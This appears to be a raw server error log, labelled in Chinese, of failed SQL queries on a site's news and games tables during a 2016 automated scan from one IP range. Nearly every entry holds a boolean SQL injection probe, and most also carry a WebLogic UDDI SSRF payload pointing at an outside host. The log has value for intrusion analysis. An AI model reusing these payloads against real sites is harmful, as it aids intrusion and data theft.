SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:06

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:06

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:53

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:53

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.70
时间 :2016-01-26 02:37:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:55

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:56

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:56

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:57

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:57

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:57

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:57

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt'
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:37:59

